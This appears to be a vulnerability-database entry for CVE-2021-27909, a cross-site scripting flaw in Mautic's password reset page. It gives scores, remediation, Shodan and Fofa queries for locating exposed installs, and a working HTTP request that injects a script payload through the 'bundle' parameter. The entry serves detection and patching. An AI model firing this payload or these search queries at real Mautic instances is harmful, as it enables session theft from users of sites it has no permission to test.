🔙 목록으로 돌아가기

CVE-2021-27909: Mautic <3.3.4 - Cross-Site Scripting

TitleMautic <3.3.4 - Cross-Site Scripting
Authorkiransau
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
RemediationUpgrade Mautic to version 3.3.4 or later to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.18658
CVE IDCVE-2021-27909
CWE IDCWE-79
Shodan Querytitle:"Mautic"http.title:"mautic"
Fofa Querytitle="mautic"
Tags cve2021 cve mautic xss acquia vuln

🔍 Vulnerability Description

Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.

🌐 HTTP Request

GET /passwordreset?bundle=';alert(document.domain);var+ok=' HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-27909.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-27909.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A